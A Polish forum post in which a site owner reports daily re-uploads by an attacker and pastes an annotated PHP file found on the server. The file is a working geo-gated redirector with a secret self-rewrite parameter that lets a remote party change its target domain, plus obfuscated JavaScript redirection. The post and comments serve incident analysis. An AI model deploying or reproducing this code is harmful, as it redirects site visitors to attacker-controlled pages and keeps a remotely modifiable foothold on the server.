
Haker wgrywa folder z plikami do katalogu głównego

  • Witam
    Usuwam foldery, a on codziennie wgrywa nowe. Foldery mają losowe nazwy i pliki chyba też. Są tam pliki .dat, .inc, .png i .php.
    Wkleję plik .php:

    <?php
    // Analyst notes (comments only; every executable line is unchanged).
    // Purpose, as far as this file shows: a geo-gated redirector. It builds a
    // URL on a randomly named subdomain of $red_host and emits an HTML page
    // that sends the browser there; visitors whose GeoIP country is not in
    // $white_countries are sent to google.com instead.
    // NOTE(review): nothing in this file creates the folder or uploads files;
    // its only write is the script rewriting itself. The daily re-upload
    // described in the post therefore has to come from another foothold
    // (e.g. a separate backdoor, stolen credentials or a vulnerable
    // component) - deleting this folder alone will not stop it.
    
    // The block comment below is a marker, not documentation: the self-rewrite
    // branch further down finds the text between its two tags with a regex
    // and treats it as the currently configured redirect domain.
    /*domain
    mail.com
    domain*/
    
    // geoip_open(), geoip_country_code_by_addr(), geoip_close() and
    // GEOIP_STANDARD are not defined in this file. Presumably this randomly
    // named include supplies them (a bundled GeoIP reader) - confirm by
    // inspecting the .inc file.
    include_once 'Ih0Ak2KYvbdt.inc';
    
    // Country codes that receive the real redirect (see the in_array() check
    // at the end of this block).
    $white_countries = array('SE', 'FI', 'BG');
    
    // Name of the GET parameter that triggers the self-rewrite branch below.
    // Useful as a search term in web-server access logs.
    $sd_param = "ehohog43";
    
    // ?action=unsubscribe prints a fixed string and stops; nothing is stored.
    // NOTE(review): suggests the links are distributed by bulk e-mail - inferred,
    // not shown by this file.
    if ((isset($_GET['action'])) && ($_GET['action'] == 'unsubscribe'))
    {
    	echo "unsubscribed";
    	exit(0);
    }
    
    // A non-empty ?id= value is base64-encoded and later appended to the
    // target URL as its id parameter. The @ hides any warning raised by
    // base64_encode().
    if ((isset($_GET['id'])) && (!empty($_GET['id'])))
        $enc_id = @base64_encode($_GET['id']);
    else
        $enc_id = '';
    
    // Redirect base host. It holds the same text as the marker comment, so the
    // self-rewrite below, which replaces every occurrence in the file, changes
    // this assignment as well.
    $red_host = "mail.com";
    
    // Self-rewrite branch: when the $sd_param parameter is present and
    // non-empty, the script reads its own source, extracts the domain between
    // the marker tags, replaces every case-insensitive occurrence of it with
    // the raw parameter value, writes the file back and answers "OK".
    // The only gate is knowledge of the parameter name, and the value goes
    // into this PHP file unfiltered, so the file must be treated as remotely
    // modifiable for as long as it stays on the server. The file's content
    // (and therefore its hash) changes after each such request, which makes
    // hash-based indicators for this file unreliable.
    if ((isset($_GET[$sd_param])) && (!empty($_GET[$sd_param])))
    {
        $self = __FILE__;
        $script = file_get_contents($self);
    
        if (preg_match("/\/\*domain(.*)domain\*\//s", $script, $matches))
    	{
            $old_domain = trim($matches[1]);
            $script = preg_replace("/".preg_quote($old_domain)."/im", $_GET[$sd_param], $script);
            file_put_contents($self, $script);
            exit("OK");
        }
    }
    
    // Target URL: a random 3-4 character subdomain of $red_host plus a random
    // 4-8 character .php name, carrying the encoded id. Host label and path
    // differ on every request, so exact-URL matching is of little use for
    // blocking; match on the base domain instead.
    // gen_rnd_str() is declared further down; PHP makes unconditional
    // top-level function declarations available before the script runs.
    $fake_script = gen_rnd_str(4, 8).".php";
    $subdomain = gen_rnd_str(3, 4);
    $full_url = "http://$subdomain.$red_host/$fake_script?id=$enc_id";
    
    // Country of the requesting address according to the bundled database.
    $ip = get_ip();
    $country = get_country($ip);
    
    // Every visitor outside $white_countries - including lookups that came
    // back as "NA" or false - is sent to google.com instead. For triage this
    // means a check made from any other country only ever sees that redirect.
    if (in_array($country, $white_countries) === false)
    	$full_url = "http://google.com/";
    
    /**
     * Builds the random lowercase string used in this file for the subdomain,
     * the fake script name and the page title.
     *
     * The first character is always a letter a-z; the remaining ones are drawn
     * from 0-9a-z. The length is rand($min, $max), but at least one character
     * is always returned because the first one is assigned unconditionally.
     *
     * @param int $min lower bound passed to rand() for the length
     * @param int $max upper bound passed to rand() for the length
     * @return string the generated string
     */
    function gen_rnd_str($min, $max)
    {
        $only_alphabet = 'abcdefghijklmnopqrstuvwxyz';
        $characters = '0123456789abcdefghijklmnopqrstuvwxyz';
        // Has no effect: the value is overwritten two lines below.
        $randstring = '';
        $len = rand($min, $max);
        // First character comes from the letters-only set.
        $randstring = $only_alphabet[rand(0, strlen($only_alphabet) - 1)];
        // Remaining $len - 1 characters may also be digits.
        for ($i = 1; $i < $len; $i++) $randstring .= $characters[rand(0, strlen($characters) - 1)];
        return $randstring;
    }
    
    /**
     * Returns the address that is handed to the country lookup.
     *
     * Order of preference: the X-Real-IP request header, then the
     * X-Forwarded-For request header, then REMOTE_ADDR. Header values are
     * returned exactly as received: they are not validated and an
     * X-Forwarded-For list is not split. Both headers are set by the client
     * or by an intermediate proxy, so the value used for the GeoIP decision is
     * not necessarily the connecting address.
     *
     * @return string address as taken from $_SERVER
     */
    function get_ip()
    {
    	if (isset($_SERVER["HTTP_X_REAL_IP"]))
    		$ip = $_SERVER["HTTP_X_REAL_IP"];
    	elseif (isset($_SERVER["HTTP_X_FORWARDED_FOR"]))
    		$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    	else
    		$ip = $_SERVER['REMOTE_ADDR'];
    
    	return $ip;
    }
    
    /**
     * Looks up the country code for an address in the randomly named .dat file
     * that ships in the same folder.
     *
     * geoip_open(), geoip_country_code_by_addr(), geoip_close() and
     * GEOIP_STANDARD are not defined in this file; presumably they come from
     * the .inc file included at the top, and the .dat file is presumably a
     * GeoIP country database - confirm by inspecting both files.
     *
     * @param string $ip address as returned by get_ip()
     * @return string|false country code from the lookup, "NA" when the lookup
     *                      yields a falsy value, false when the database
     *                      cannot be opened
     */
    function get_country($ip)
    {
    	// Relative path: the database is expected next to this script.
    	$gi = geoip_open("GkUWjDl0hbp.dat", GEOIP_STANDARD);
    
    	if ($gi)
    	{
    		$country = geoip_country_code_by_addr($gi, $ip);
    		geoip_close($gi);
    
    		// Unknown address: use a placeholder that matches no listed country.
    		if (!$country)
    			$country = "NA";
    
    		return $country;
    	}
    
    	// Database could not be opened; the caller treats this as "not listed".
    	return false;
    }
    
    // Output template. The page redirects the browser to $full_url in two
    // ways: a meta refresh inside a noscript element for browsers without
    // JavaScript, and a script whose hex-escaped strings decode to "replace"
    // and "location", i.e. window["location"]["replace"]($full_url).
    // The page title is another random string from gen_rnd_str().
    // $full_url is echoed without HTML or JavaScript escaping.
    // The doctype line is malformed as written (the "!" is missing).
    ?>
    <DOCTYPE html PUBLIC "-//W3C//DTDXHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
        <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
        <noscript>
            <meta http-equiv="refresh" content="0; url=<?php echo $full_url; ?>"/>
        </noscript>
        <title><?php echo gen_rnd_str(4, 8); ?></title>
    </head>
    <body>
    <script language="JavaScript" type="text/javascript">
    var _0x9129=["<?php echo $full_url; ?>","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];window[_0x9129[2]][_0x9129[1]](_0x9129[0]);
    </script>
    </body>
    </html>
